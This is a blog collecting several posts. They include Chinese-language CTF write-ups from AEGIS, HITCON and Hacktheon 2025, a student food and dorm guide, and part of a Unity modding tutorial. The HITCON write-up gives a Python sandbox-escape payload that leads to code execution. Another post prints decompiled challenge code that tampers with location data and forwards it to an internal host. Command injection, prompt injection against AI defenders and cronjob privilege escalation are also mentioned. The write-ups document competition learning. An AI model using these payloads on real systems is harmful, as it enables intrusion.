Flydragon's Blog

AEGIS 神盾盃 2025 Qual/Final Write-up 與心得

Sun, 28 Dec 2025 00:00:00 GMT

前言

神盾盃是台灣除了技能競賽以外獎金最高的比賽，但限制大學以上才能參加
這次跟 CakeisTheFake 的好夥伴們一起參加，初賽第三名以及決賽第二名

共拿到 90200 元獎金，賺爛了賺爛了

神盾盃初賽

前十名可以進入決賽，進入決賽就保底三萬元獎金
所以如果是為了錢打比賽的話可以單刷進決賽，這樣會拿到最多錢

gochal

就是一個 XOR flag checker，只是用 golang 寫

import base64

b64 = "W257U3hHXURjfERORUlOdUBZRUJSRV9Uc1hjfUpRfwpB"
key = (0x1A, 0x2B, 0x3C)

data = base64.b64decode(b64)
flag = bytes(b ^ key[i % 3] for i, b in enumerate(data)).decode("utf-8")
print(flag)

call back

追一下可以發現邏輯寫在 sub_7FF7679F11C0 這邊會讀 flag.txt 然後會跳到寫在 data 段的 shell code

看後面的訊息可以猜這題也是 flag checker

飛去 unk_7FF7679F5040，make function，可以確認就是 flag checker

後面就是老生常談了

TARGET = "8A167732F632676EF2FE0B42DC066342D856895CC6FC5B5AEA582360D27C3962E62A2F14D80C2342C8F41F6E"
K = 0x0094E590

t = bytes.fromhex(TARGET)
arr = bytearray()
for i in range(0, 44, 4):
    T = int.from_bytes(t[i:i+4], "big")
    U = ((T - 0x14) & 0xFFFFFFFF) ^ K
    arr += ((U >> 1) & 0xFFFFFFFF).to_bytes(4, "big")

orig = bytearray(44)
for i in range(0, 44, 2):
    orig[i], orig[i+1] = arr[i+1], arr[i]

print(bytes(orig))

NestingZip

給了一個嵌套超多層的 zip 檔，可以寫個腳本解出最後的檔案

import os
import zipfile
import shutil

def recursive_unzip(zip_path):
    zip_path = os.path.abspath(zip_path)

    while True:
        extract_dir = os.path.splitext(zip_path)[0]
        with zipfile.ZipFile(zip_path, "r") as zf:
            zf.extractall(extract_dir)

        entries = os.listdir(extract_dir)
        if len(entries) == 1:
            candidate = os.path.join(extract_dir, entries[0])
            if zipfile.is_zipfile(candidate):
                print(f"\rzip: {candidate}", end="")
                shutil.move(candidate, zip_path)
                shutil.rmtree(extract_dir)
                continue
        break


if __name__ == "__main__":
    recursive_unzip("Nesting.zip")

解完之後可以拿到這個 NOTflag.txt

vrq4tqyEs8zIoJLMoIvMk5Oghs+KoJ6gjMycjZrIoLyGncyNvJfMmaDOjKCeoMbPz5ugyJfOkcaC

base64 decode 出來是亂碼，傻住了十分鐘，看檔名才猜到要再做一次 NOT

m - rsa

chatGPT 解掉了，好爽ㄏㄏ

思路（簡述）
1. 伺服器有一個固定的 3×3 矩陣 A，中心是未知 m，外圈 8 個素數會印出（或印出矩陣 A，中心不是數字）。
2. 每次輸入 'y' 會給一組新的 RSA n 與 c = A^19 (mod n)。
3. 因為 det(A^19) = det(A)^19，且 det(A) 對 m 呈線性（沿中心元素展開），
所以蒐集多組 det(c) (mod n) 用 CRT 還原 det(A^19) 的整數值，取整數 19 次方根得到 det(A)；
接著 det(A) = K*m + B ⇒ m = (det(A) - B) // K。
4. 最後把 m 轉回 bytes 看看是不是可讀字串。

cipher restraunt

是一個 python exe，可以拆 pyc 還原邏輯，但沒用總之可以用不同方法拿到一堆圖片 (A~Z)

exiftool 看圖片 comment 照著提示用 steghide 解，可以集齊這些提示

I am Legendary Utensil, and I can transform ingredients into dishes.

I want to eat the food that the chef made, but he gave me gold coins and asked me to buy the ingredients on the list. The list only says "PRIME". What are these ingredients?

The chef loves prime numbers, and he will use them as ingredient codes.

還有這張圖片

答案是要把 P R I M E 五張圖對應的質數（圖片 Title）相乘之後跟沒用到的那張圖片一起丟進 OpenPuff

到底誰想的到 = =

Result

第三名，成功進決賽，好耶去台南玩囉
其他隊友的初賽 write-up:

Whale 神盾盃 2025 Qual Writeup - by Whale120
Naup 2025 神盾杯 Qual - writeup
rota1001 (還沒寫😡)
Aukro (還沒寫😡)

神盾盃決賽

進決賽的又是一堆老熟人，忘記誰提的絕妙點子：大家一起包棟民宿
我剛好有 Agoda 白金會員，所以就幫忙訂，結果訂到一間離會場超遠的💀
總之我們四隊的人就一起住，剛好還順便練習了 GCC 面試（決賽和面試撞期）

決賽的賽制是霸主攻防+滲透
霸主攻防就是 pwn / prompt injection，霸主可以上 patch / 下防禦 prompt
主要算分是看滲透，霸主攻防影響的是額外獎金跟分數倍率

Day 1

發現沒帶 RJ45 轉接頭，只好 UberEat 送過來
一條 600 的轉接頭，開局直接 -600
甚至不是馬上送，送到都已經下午了 = =

直接被硬控半天，只能去看 pwn，幸好第一天的 pwn 都是常見的洞
寫了一個 cmdi 的 exploit 之後就只負責把哪裡有洞整理成 List 丟給隊裡的 pwnGPT，拿到網路線之前真的太坐牢了，debug 還要跑去看隊友電腦

（沒內網，跟 pwnGPT 對話辛酸畫面流出）

這個 cmdi 爽到 12:30 左右就被 patch 掉了
後面就是一直 exploit -> patch

只好一直吃小點心，又要到飯了

prompt injection 拿了之前收集的 prompt 去戳都失敗了
但幸好只 delay 1 回合，等有人成功再抄作業就好了

終於拿到網路線之後去看滲透，接手的時候鯨魚已經 access 兩台 warmup 獨立靶機，但其中一台不知道怎麼提權

上去翻垃圾很久都沒想法，後來想說再看一下 LINPEAS 好了
然後就看到一個 root cronjob，然後檔案可寫超ㄏ

總之快樂提權、把那台上的 flag 都撈一撈之後 Day 1 就差不多結束了

Day 2

第二天都在跟鯨魚打 AD Set，因為 AI 達人 Aukro 把 AI 題拿捏了
Initial Access 要打 Blind XXE，我是一點想法都沒有🤡
幸好台大林同學很強，我還在點心區做奶精奶茶的時候他就打進去了

翻這台 WEB01 可以拿到連 DB01 的 credential，然後 DB01 可以 link 到 DB02
目前為止就有好幾把 flag 能拿了，帥帥帥

但沒出意外的話就要出意外了，開始卡關

WEB01 提權完了，在 DMZ 外面摸不到其他台
DB01 找不到提權路徑
DB02 找不到提權路徑

只好忍痛開錦囊（有 quota 可以問主辦單位拿提示）
原來是 DB01 link 到 DB02 還可以再 link 回來，此時就是 DB01 sa 了

此時我就滑壘中離了，因為忘記要面試 GCC ㄏㄏ
城市老鼠般躲到旁邊的樓梯間偷偷面試，問題是樓梯間用了感應燈
自我介紹的時候燈一直暗掉，我又沒有開視訊鏡頭，面試老師那邊聽起來就是我一直卡詞講不好，但其實是因為眼前一片黑我在邊嘗試開燈邊講
無助的像是剛出生的小鹿一樣，最後也理所當然地沒錄取😭賠了夫人又要當一年兵

面試結束，回來之後還是沒啥想法，一直困在瀏覽器紀錄的 rabbit hole，鯨魚也把該拿的 flag 都拿完了（很多）
後來我就回 WEB01 繼續翻垃圾，發現有個 IDOR 的 flag 漏拿了
體驗了一把垃圾堆裡撿到錢的快感

我們的垂死掙扎就是不停開錦囊，但都沒甚麼用了
止步於 DB02，拿不到 shell QQ

後來問了隔壁牛肉湯，說是用祖國人寫的工具可以掃到 DB02 的 sa 弱密碼，牛逼666

結束之前麒升學長還打了一個沒人打的 pwn 帥帥帥（然後就被 patch 掉了，霸主不講武德）
幸好最後我們是第二名，耶

其他隊友的決賽 write-up:

Whale 神盾盃 2025 Qual Writeup - by Whale120
Naup (還沒寫😡)
rota1001 神盾盃 2025 write-up
Aukro (還沒寫😡)

後記

今年神盾是我參加過覺得題目品質最優的決賽
有趣又能學到東西，難度也不會過高
不過收穫最大的是從隔壁組聽到 DCSync 的笑話，真的超好笑

DCSync = Discord Sync

隔壁組都是綠色勾勾的紅紅實習生跟打 pwn2own 拿過幾萬美金的大駭客
反觀我們這組都是乖寶寶好學生，我覺得輸的不冤😤
（反串要註明）

離開台南之前我們吃了炸串吃到飽當慶功宴，耶

HITCON CTF 2025 Qual/Final Write-up 與心得

Sat, 27 Dec 2025 00:00:00 GMT

前言

今年剛好同時參加了 Cyber Range 和 CTF，而且拿了第一名，這種經驗應該蠻少見的，所以決定紀錄一下。

星爆牛炒竹狐拆隊了，正常來說遇到這種情況我會跟 Cake 好朋友們一起打，但因為各種 Drama 我們也拆隊了。最後攜家帶眷加入竹狐，感謝 Ching 和竹狐的大家願意收留我們 ><

不過我的拖延症太嚴重，這篇拖很久才寫，題目細節都忘了很多，就紀錄我印象比較深的題目，拍謝

HITCON CTF 初賽

應該是公認目前台灣難度最高的 CTF 比賽
而今年初賽的前四名台灣隊伍可以進入實體交流賽（類決賽）

vibe2

是一個會用 matplot 畫圖的程式，流程簡單來說如下

生成一組隨機的 secret_phrase 字串
這個字串可以用 ASCII bytes 表示，再用 matplot 把這個 list 印出來
五分鐘之內把圖還原成 secret_phrase 就能拿到 flag

但因為這個圖的畫法還蠻複雜的，點之間可以互相影響畫法，沒辦法一個點一個點爆破，但去逆向畫法更不現實，所以我往設置 constraint 降低爆破難度的方向去想

不斷重新抽圖直到 secret_phrace 中同時出現 ! 和 z（透過圖高度是否最高判斷）
爆破三個點直到 match 這一小段的 target

刷首抽成功的機率是 32% (by ChatGPT)，聽起來蠻 feasible 的但這樣會 TLE 😭

轉個念想想覺得五分鐘其實滿多的，感覺可以刷完首抽之後手動拉圖
所以就 vibe coding 了一個 GUI 拉圖工具

在我眼睛瞎掉/拉圖成功之前 unicorn 就把這題解掉了，真的好強...
大概就是假設 secret_phrace 的結尾是 z! 然後爆破其他位子看圖有沒有變更像

huge-hashtable

這題是筆記管理系統，有一個自己實作的 hash，有以下功能

註冊/登入/登出
創建/讀取筆記

那個時候我的想法是直接爆，大力出奇蹟（好傻好天真）

但這個時間複雜度直接炸裂，失敗之後就都沒往碰撞的方向想，最後沒解出來QQ

後來看到 HITCON Discord 有人分享解法，是找 hash("note-{owner}-{title} 跟 hash("user-{username};") 的碰撞（birthday attack）做出 heap leak 再用任意讀拿 flag

我記得這題當初不是標 pwn，騙我 😭

simple-drive & simple-drive2

被其他題目痛擊之後四處逛其他隊友解到一半的題目
這題是一個雲端 drive，我看到的時候 Naup 跟 Dr.Dog 已經把解法想出來了，甚至腳本都寫得差不多了
但語音聽起來他們有點 struggle，找不到腳本錯在哪，所以我就去把腳本寫出來撿頭了抱歉ㄏㄏ

然後這個解法應該是 unintended，就這樣順便解掉 revenge 題了
爽賺

Result

初賽竹狐是最高分的台灣隊伍，也是世界第十三名
成功進入實體交流賽🥳，另外三隊也都是老熟人了
除了透過初賽晉級以外，AIS3 會另外推薦 2 隊直接進入決賽
結果我在賽後收到推薦了，超虧
後來 AIS3 推薦的兩隊是 Blue Goblin 跟 10F，其實約等於初賽第五名的隊伍拆成兩隊，意外地超級公平

HITCON CTF 決賽

時至今日，我還是不知道能不能把這個實體交流賽稱為 HITCON 決賽（因為沒有外國隊伍）
但講決賽聽起來比實體交流賽厲害，雖然有些彆扭我還是要叫他決賽 :D

這次決賽是 belluminar + esports 賽制，簡單來說就是隊伍互相出題互相解
然後主辦單位會額外出題讓隊伍跟隊伍之間單挑，很像電競比賽

我們出的題目

這邊幾乎都是隊友做的，拿其中一個隊友的特選故事改編，弄了一個 galgame 超好笑，但我怕被告就不講細節了

之前做晨晨力量人的時候剛好也是用 krkr-like 的腳本引擎，所以有去幫忙寫了一段遊戲的劇情腳本

想看完整題目的話可以看 ian 的 blog

no-call-revenge-revenge

yet another vincent55 出的 pyjail 題目

看這題的時候剛好同事（傳說中的 Mow 跟 YK）在旁邊，所以就一起看
這樣我四捨五入也算是跟 Balsn 還有 Double Sigma 打過比賽了吧

#!/usr/local/bin/python3

import unicodedata
print(open(__file__).read())
expr = unicodedata.normalize("NFKC", input("> "))

if "._" in expr:
    raise NameError("no __ %r" % expr)

if any([x in "(['\"+-*/ ])" for x in expr]):
    raise NameError("no (['\"+-*/ ]) %r" % expr)

# no breakpoint for you :>
if "breakpoint" in expr:
    raise NameError("no breakpoint %r" % expr)

eval(expr)

這題把之前在 AIS3 pre-exam 的 nocall-revenge 多 ban 了 breakpoint

可以用 nocall-revenge 提到的做法用 for 把沒被 ban 的運算子蓋掉，而且一次蓋兩個成 eval 跟 input 之後就可以直接 import os RCE

{0	for	help.	__class__.	__xor__	in{eval}}	and
{0	for	help.	__class__.	__invert__	in{input}}	and
help^~help

Silent-Sync

Gemini 直接解掉了，超級無敵爽

HITCON University "SIP" System Challenge

黑箱題，Xtrimi 跟 albert5888 發現可以用 sqli 愉快的拿到 fake flag Ching 發現這台主機有跑 SIP

Xtrimi 戳到連上 sip 的方法

Xtrimi 繼續發力，發現連上之後按 * 輸入 1024 可以進入下一階段解 RSA

送出答案的時候，超過十個按鈕會被截斷，可以推測答案是 9 位數字 + # 送出鍵或 10 位數字

於是 Dr.Dog 開始不停嘗試各種可能性，但都解不出來

最後我在凌晨兩點通靈出來了，送 65# 就能拿到 flag
我記得解完這題之後我跑去寫學校作業寫到早上五點，也是很有生活了

解完直接找出題者呂老闆抱怨，但有一說一 SIP 蠻有趣的

Driver Killer

給了一台 VM 跟沒權限讀的 flag.txt
提權到 NT SYSTEM 之後（忘記那時候怎麼提的，但蠻簡單）
再去看 flag.txt 會發現是一個爛掉的 flag
印象中大概長這樣 hitcon{http://xxxx.xxx/chat XXXXXXX}，總之看起來後半段是加密過的，前面 URL 我想說是 rickroll 之類的東西就沒看，逛了一下沒看到甚麼可疑的 Driver，就放棄了

後來 albert5888 說那個 URL 就是第二關，過去打 prompt injection 就好了 = =

Esports - Android 計步器

少數可以整組一起參加的 Esports 題，這題是一個計步器的 apk，搖晃手機就可以加分現場一堆人在那邊搖手機，非常抽象

直覺的思路是去看加分的邏輯然後直接打 request，我拆了 apk 之後發現加分的邏輯有點複雜，但單挑賽分秒必爭沒時間逆向
所以反手打開 android interpreter，結果甚麼封包都攔不到，太久沒用不知道環境什麼時候爛掉的，隊友看起來也沒人會 android

只好改變思路把 anti-debug patch 掉，再用模擬器轉

patch 完之後 Dr.Dog 發現可以 patch 一下頻率限制

但這個時候已經結束了，幸好第三名沒被淘汰
奪冠熱門牛肉湯也因為這題進到敗者組

Esports - 貓咪大戰爭

一個 Rust 版網頁貓咪大戰爭，總之可以 race condition 做 underflow 拿無限金錢
可惜這題是單挑題，雖然我寫完 exploit 了但 Esports 題只有台上的人可以打
把腳本傳給隊友的話應該就算作弊了 ... 只好飲恨看著隊友用手打贏對面的腳本（？

ian 奇蹟般地用手打贏之後我們就進 Esports 決賽了
決賽是點餅乾遊戲的逆向題，Naup 還在逆向的時候
對面 10F 反手就掏出連點器直接奪冠（用魔法打敗魔法.jpg）

HITCON Cyber Range 決賽 (as staff)

其實這次到現場並不是以 CTF 參賽選手的身分，而是 Cyber Range 的 STAFF 😎（歡迎加入 TRAPA）
我出了兩道題目也做了視覺化，所以需要待在現場以免出問題
但題目內容應該沒辦法說就是了，這邊會紀錄一些其他東西

當 staff 的好處之一就是可以跟老闆 ddaa 一起住飯店，爽度不亞於讓 agent 自動解題目

這次視覺化是從去年的版本改的，改掉了一些令人詬病的問題
加入了廣受好評的遙控功能，現在甚至還能噴火
如果你想花 100 億之類的買下視覺化的話可以聯絡我們老闆

幸好我負責的部分都沒出事，就在旁邊打了兩天的 CTF ㄏㄏ
會場旁邊還有一些社群的攤位，當然也有免費食物，乞丐超人再次要到飯

後記

拿了第一名
開心開心開心，超扯超扯超扯

感覺還是挺勵志的，我這種沒甚麼料的人還是可以靠大戰隊拿到第一名
實在是德不配位，希望總有一天能變成很強的人🙏

Fun fact 1: 2024 和 2025 年 Cake 的四個成員都有參加 HITCON CTF 但 Cake 的隊名沒有以任何形式出現過 QQ

Fun fact 2: 頒獎時我們是第二名，事後才發現分數算錯了其實是第一名，所以圖片中我們是拿第二名的板子

Fun fact 3: 頒獎時 10F 是第一名，但大家都以為會是牛肉湯，當時氣氛超級微妙

Fun fact 4: 在走道聊天遇到蕭老師跟寬寬，和他們說我在竹狐，他們看起來頗驚訝竹狐不是純交大戰隊，突然有種叛國的背德感

Fun fact 5: 坐電梯其實是站電梯

Hacktheon Sejong 2025 Write-up 與心得

Sat, 26 Apr 2025 00:00:00 GMT

前言

Hacktheon Sejong 據說是韓國版的金盾獎，看到前年很多人飛韓國參加就一直蠻想打的
因為限制只有大學生能夠參賽，所以是第一次參加，也就代表 Cake 的好隊友們不能陪我打了 QQ
這次跟 albert、呂老闆、slash（他去打黑客松了，嚴厲斥責）一起打，最後是第 42 名。註：前 10 名可以去韓國打決賽

順帶一提，國籍可以填 Taiwan，填 ROC 的話國旗會是 China

防雷寫在前面：這篇 Write-up 都是 20+ solve 的水題，且大量使用 LLM，想看更完整的解答可以等牛肉湯 / I'm down QQ / 吉娃娃的 Write-up

賽制

Jeopardy
分數線性降低、無首殺分
分為 Advanced 組和 Beginner 組，題目似乎相同
題目分階段解鎖，解掉當前階段任一題目就會開放下一階段的題目

Reverse

Barcode

ELF 會讀入一個 hex-string 並根據 hex-string 輸出 '*' 和 ' ' 組成的圖形，給輸出檔案要求回推原始輸入

範例：

❯ ./barcode 0x1111111122222222
 *   *  
 *   *  
 *   *  
 *   *  
*   *   
*   *   
*   *   
*   *

乖乖打開 IDA 逆，總之關鍵在這輸入的 hex-string 會被切成每 8 個 bytes 一組，分別代表 8x8 的 Block，除了第 0 個 Block 以外，對每個 Block 都先 XOR -1 (就是 NOT) 再和前一個 Block 做一次 xor，最後根據每個 bit 輸出結果

逆完把邏輯丟給 ChatGPT 再修一下 Spec 就能生出解題腳本了

import sys 
MASK = 0xFFFFFFFFFFFFFFFF  
def slurp_blocks(stdin_lines): 
    rows = [ln.rstrip('\n') for ln in stdin_lines if len(ln.rstrip('\n')) == 8] 
    return [rows[i:i + 8] for i in range(0, len(rows), 8)] 
 
def block_to_int(block): 
    v = 0 
    for r in range(8): 
        for c in range(8): 
            if block[r][c] == '*': 
                v |= 1 << (r * 8 + c) 
    return v 
 
def recover_orig(out_blocks): 
    orig = [out_blocks[0]] 
    for i in range(1, len(out_blocks)): 
        orig.append(((~out_blocks[i]) & MASK) ^ orig[i-1]) 
    return orig 

def main(): 
    out_blocks = [block_to_int(b) for b in slurp_blocks(sys.stdin)] 
 
    orig = recover_orig(out_blocks) 
    hex_string = '0x' + ''.join(f'{v:016x}' for v in orig) 
    print(hex_string) 
 
if __name__ == '__main__': 
    main()

Bridge

apk 裡有 encode 跟 decode 能 call，給 encode 過的結果，flag 是 decode 的結果

看到 apk 就拿出 android 死人三件套

jadx
apktool
frida

這次只用到 jadx 跟 frida 而已
從 Mainactivity 往上追

追到最後會發現 load 一個 Library 要逆這個光聽就覺得麻煩了，所以還是動態解就好

把 Frida server 推到模擬器上面待機之後
Attach 並執行腳本 call decode 就好了

frida -U -p <bridge_pid> -l .\solve.js

Java.perform(function() {
    var BridgeLib = Java.use('com.hacktheon.bridge.BridgeLib');
    console.log('Hooked');

    var enc = "4658hg76<h85eed73ihghidi8ehf<78;";
    var decoded = BridgeLib.decode(enc);
    console.log('Flag: ' + decoded);
});

I love reversing

Pyinstaller 打包的 exe 檔，做了甚麼不重要

自從上次打 EOF Final 被 pyc 坑慘之後就一直記著這個西方神秘網站 PyLingual 再搭配 pyinstxtractor 就能解了

先用 pyinstxteactor 拆出 .pyc 檔案，再用 PyLingual 還原回 Python 檔

根據題目說明可以知道 flag 就是 2.593627

# Decompiled with PyLingual (https://pylingual.io)
# Internal filename: infect.py
# Bytecode version: 3.12.0rc2 (3531)
# Source timestamp: 1970-01-01 00:00:00 UTC (0)

import requests
from flask import Flask, request, jsonify
app = Flask(__name__)

def infect(location_data):
    location_data['latitude'] += 2.593627
    location_data['longitude'] += 2.593627
    return location_data

@app.route('/location_data', methods=['POST'])
def location_data():
    location_data = request.json
    print('Received data from attack instruction PC:', location_data)
    location_data = infect(location_data)
    url = 'http://192.168.101.101:4653/location_data'
    response = requests.post(url, json=location_data)
    print('Response from ship node:', response.text)
    return jsonify({'message': 'Data forwarded to ship node successfully!'})
if __name__ == '__main__':
    app.run(host='0.0.0.0', port=4653)

Forensics

Shadow of the System

給了一個 SYSTEM 檔案，要求找到可疑行為後印出的字串

用 RegExp.exe 可以在 ControlSet001 底下找到很多 Service，根本看不完

查 cmd.exe 也一堆
最後從題目敘述通靈搜 backdoor 找到了

註：有試過直接 grep 找不到，後來發現要搜 unicode

Watch

給了 Cache0000.bin 要還原出當時 RDP notepad 寫的字串

可以用 BMC-Tool

python3 bmc-tools/bmc-tools.py -s rdp/Cache0000.bin -d output -b

可以找到這個

註： -b 可以自動拼成大圖

Hidden message

給張圖，要找隱藏訊息

StegOnline 可以簡單解掉
Extract LSB 就可以看到 flag

後記

感覺下次可以報 Advanced，好像比較容易進決賽

唉真的越來越菜，要多打一點 CTF 了
拜託揪我

台大資工大一上修膳心得

Sat, 01 Feb 2025 00:00:00 GMT

前言

⚠️本人文筆極差，文學造詣比較好的同學拜託別看，怕你看到中風⚠️

看到大家都在發修課心得，搞得我心癢癢的也想寫
尤其現在網路上查的到的修課心得全都是電神寫的，每個 GPA 都超高，實在迫切需要一篇真正的普通人寫的心得
但後來想想，看個學渣大談修課實在沒啥意思，不如就來分享吃飯跟生活上的心得吧 >.0

修膳心得

根據不同價格帶分享一些喜歡的店，希望拋磚引玉看到其他人分享修膳心得。

0 ~ 100 元

i珍食 & 友善食光

評級：S
地點：各大超商
推薦餐點：通常越少見=越好吃

這個價格帶不用多想了，超商的乞丐食品是我們能吃到最頂的食物。
水源宿舍附近就有四間超商，抓好時機去的話不太需要擔心買不到的問題

五九麵館

評級：A
地點：公館跟 118 巷都有
推薦餐點：五九乾麵

80 塊一碗，有菜有肉還好吃系列
不過通常人很多而且資工系學生也很多，吃個飯到處是熟面孔，I 人慎入

二八麵堂

評級：B
地點：118 巷
推薦餐點：肉麻麵

五九吃膩之後終究需要其他麵店

學餐

評級：B
地點：小福樓
推薦餐點：摩斯 99 元套餐

不得不說，台大學餐真的蠻拉的，而且評價普遍兩極
除了小福的 99 元摩斯漢堡套餐！我都偷溜進普通邊吃邊旁聽，生活美滋滋

100 ~ 200 元

祥滿速食餐坊

評級：A
地點：水源市場
推薦餐點：海鮮火鍋

買烤布蕾的時候可以順便吃
料滿滿的海鮮火鍋，湯都是海鮮的清甜
不過畢竟在市場裡，環境不算乾淨

阿孟石碗燒河粉

評級：A
地點：118 巷
推薦餐點：石碗燒牛肉河粉

這輩子吃過最好吃的牛肉河粉。

容城麻辣mini火鍋

評級：A
地點：汀洲路
推薦餐點：火鍋

人情味十足的小火鍋，180 一鍋算公道價了
這家有王子麵吃到飽，killer 級品項，其他同價位小火鍋都是白飯吃到飽
鍋in跟唐老鴨都蠻值得去的，但我喜歡吃泡麵

築本屋

評級：A
地點：公館捷運站
推薦餐點：豬排定食

同學推薦的優質餐廳，180 就能吃到日式定食
跟有優惠的福勝亭差不多價位，小菜可以續

好吃好吃牛排

評級：A
地點：公館
推薦餐點：學生牛排

生菜、麻辣鴨血、肉燥吃到飽，比附近自助吧吃到飽的爽一點
圖片是他們的威靈頓牛排但學生牛排才是最頂的

生魚飯

評級：B
地點：公館

震驚南部人三百年系列，有菜有海鮮居然兩百有找
來台北之前都沒吃過這種食物，公館附近很多間就不瞎推薦了

稻咖哩

評級：B
地點：溫州街

聽說起司豬肉咖哩很好吃，但我每次（兩次）去都賣完了
墨魚咖哩的趣味性十足，衝著能看到未來的大老闆們滿嘴黑這點就值得一去

義樂麵屋

評級：B
地點：羅斯福路
推薦餐點：青醬義大利麵

用優惠券之後挺划算，沒有優惠券的話找你住水源的同學拿

200 元以上

小灶咖咖哩

評級：A
地點：汀州路
推薦餐點：紅酒牛肉咖哩

乞丐如我，200 元以上的餐廳我通常是不吃的，除非忍不住。
清爽的咖哩，必吃系列。不過他們搬家之後我還沒吃過

水源夜市

評級：A
地點：水源市場
推薦餐點：燒肉冠軍侯、放羊吃草、素食地瓜球、吉拿棒、煎鳥蛋

財富自由大概就是去夜市不用看價格吧
除了煎餅果子跟煎蔥餅還沒吃過，個人覺得這五家是最優的

榮譽榜

鳳城

上完體育課配上鳳城三件套，夫復何求。

麗宴精緻快餐

有湯可以喝的學餐。

各種附餐點的活動

跟剩食社團一樣是 CP 值帝王
蹭飯吃得好，月底沒煩惱。

大一上的幾個抉擇

大一上有些選擇讓我猶豫很久，分享一些我的看法。

宿舍

懶人包：BOT

男一/BOT 都幾

當初在男一跟 BOT 之間掙扎很久，聽說 BOT 有幾個缺點，但住進來發現都問題不大。

很貴
- 租屋補助過後 BOT 還是比男一舍貴不少，但光是獨立衛浴就絕對值得花這個錢。
- 其實只有單人房特別貴，雙人房或三人房的價格都蠻有競爭力的。
離系館很遠
- 水源距離騎腳踏車十幾分鐘的路程，很近啦
- 長興離系館很近；水源離捷運站比較近
很難抽
- 我是第一輪就抽到第一志願
- 聽說今年新生是備取都有上，應該有心等都能住
管很嚴
- 要刷兩次門禁，但我都跟在別人後面進
- D卡都說不能帶異性，但我的 Fake AP 有抓到人偷帶
交不到朋友
- BOT 也有多人房，不過是外生比較多
- 確實住男一認識同系的機會比較大（畢竟是四人房）

當然有條件的話在外租房最舒適。

BOT 奇聞軼事

開學三個月，住雙人房的我遇過三個室友，前兩個太酷了實在是必須記錄下來第一個室友很晚入住，哲學系研究所的學長，他的 blog 寫很多有趣的辯題也得很多校內的獎項，重點是他還幫付電費跟買浴室小物，優質室友。不過他一入住就說會搬去單人房，排到之後就馬上搬走了。

第二個室友實在骨骼清奇，會在我用電腦的時候站在我後面不發一語，問他只會說「我控制不了自己」，後來他休學回國治病了，留了兩雙我們兩個都穿不下的名牌球鞋跟一串衛生紙給我，人其實挺好的。

第三個室友是整棟宿舍最頂的室友沒有之一，付了錢辦了入住就沒出現過。

宿營&系烤&舞會

懶人包：E 人參加，I 人不用參加。

宿營

喜歡跟人互動的話就會玩得很開心，不喜歡的話就會很坐牢。
如果你跟我一樣不敢跟女生交流的話也不用擔心，因為基本上全都是資工系的
現在比較熟的同學有一半都是宿營講過話的，有參加有差再講更多就會暴雷了，總之就是活動都很用心舉辦。

系烤

通常會跟認識的人團報，而且是開學後的活動，所以不像宿營那樣可以認識很多系上的同學
不參加也沒關係的活動，但我有交到新朋友所以還不錯ㄏ

舞會

以為是很認真的跳舞活動所以沒報名，後來才知道好像跟南部的耶誕晚會差不多概念
看同學限動感覺就是去夜店玩，有符合 dress code 的衣服可以去看看

系學會費

懶人包：系核可繳，系邊可不繳。

繳系學會費最大的好處就是有衣服、系櫃、工作坊，如果其中兩樣你有需求的話蠻值得繳的，很划算。
但我沒加系隊不太需要櫃子，工作坊教的也是蠻簡單的東西（Markdown、LaTeX、Linux 基本操作等）
擔心不能打桌遊或麻將的話就想多了，我都蹭有繳錢的人。

社團

懶人包：不加社團也可以。

學校很多各式各樣的社團，進來才知道沒有資安社，
後來想加蛋糕社，結果收滿了不給加，下學期的招生表單也是五天就閃電關閉，都把他們粉專設搶先看了還是沒看到貼文，被臉書搞超級難過的，希望畢業之前有機會去做蛋糕。
雖然沒加社團也不會有什麼影響，但少了認識外系同學的機會非常可惜。

實習

懶人包：經驗/GPA 二選一

前面幾樣我都掙扎蠻久的，實習倒是沒怎麼考慮就衝了
之前就挺嚮往在業界實習，目前為止是沒後悔，分享一些從我的個人經驗整理的優缺點

優點：

可以跟偶像共處一室 >///<
- 以前只能遠觀的大神級人物現在就是老闆/同事
- 現在知道君王論就是 bullshit，優秀的領導者能讓底下的人不自覺地拿出好表現。
累積工作經驗
- 實習之後才知道大人都在騙人，工作比讀書開心很多（希望三十年內我都這麼想）
白嫖公司資源
- 各種層面上的資源，總之會比想像中的多很多

缺點：

比較忙一點
錢比家教少
- 除非你天賦異稟，不然實習薪水會比拿著台大身分接家教低
- 老實說前面那些優點不用付錢就賺爛了，有錢拿根本是 Stealing deal

個人是 GPA 放推也可以接受大岩壁，自然是不會放過實習這種大好機會
如果你想發家致富或是要追求書卷獎的話就不太適合了

Ubike 還是買腳踏車

騎了一整學期的 Ubike，確實可行但建議買一台腳踏車
只要因為全有全無律遲到一次就會後悔不買車了

待在系館

強者學姐寫的文章提到要常去系館才不會被強者們拋下
目前沒啥感覺，可能我太笨沒發現已經被拋下了🥲，不過系核們確實常待在系館。

Unity 逆向入門第三篇：UnityExplorer

Mon, 12 Aug 2024 00:00:00 GMT

前言

AIS3 結束了，繼續寫這個系列
這篇會介紹一些酷酷的工具像是 UnityExplorer、AssetStudio

MelonLoader + UnityExplorer

除了乖乖用 IL2CPPDumper 反編譯以外，還有更粗暴的選擇：MOD
甭管他是 IL2CPP 還是 Mono，UnityExplorer 直接一刀殺進去。

MelonLoader 搭配上 UnityExplorer 實在是非常強大，建議看完這篇直接上手體驗，用過都說讚。

安裝方法

先安裝 MelonLoader，選擇遊戲執行檔後按 install 就好，非常銀杏（建議都用v0.5.X）
失敗的話也可以換成其他的 MOD Loader 試試看

安裝完成後執行遊戲，除了遊戲畫面還會多出現一個視窗

接下來再安裝 UnityExplorer，Release 找到對應檔案之後解壓會是這兩個資料夾

直接複製到遊戲資料夾就好了

接下來再執行遊戲就會看到酷酷的視窗

如何使用

最主要就是兩個功能

Explore Scene
Hook

Explore Scene

既然叫做 Unity Explorer，具體是怎麼個 Explore 法呢？

可以看到當前這個 Scene 有哪些 GameObject
當然也可以透過 Load Scene 直接到其他的場景

對著好奇的 Object 點一下，就可以查看它的詳細資料

針對這個 Object 就有這些事情可以做

複製/破壞
改變 Active State
改變 Transform
改變 Tag/Layer/Flag
新增子物件/Component

對著 Component 點一下，也可以進一步查看或是修改
像這邊 Grounded、timer、self 三個變數都可以去做修改
也可以直接呼叫裡面的 Function

例如這邊我把紅球的 self 替換成黃球的 prefab
就可以有這種效果

看到這裡，你可能會覺得這是標題詐騙，怎麼都在玩甚麼 Object 說好的 Explore 呢
其實用 Freecam 功能就可以

網路上有些"拆包"或是"開發者視角"相關的影片應該有很大一部分就是用這個 Freecam 功能

C# Console & Hook

UnityExplorer 真正的強大之處是可以執行自己寫的 C# Code 跟輕鬆做到 Hook

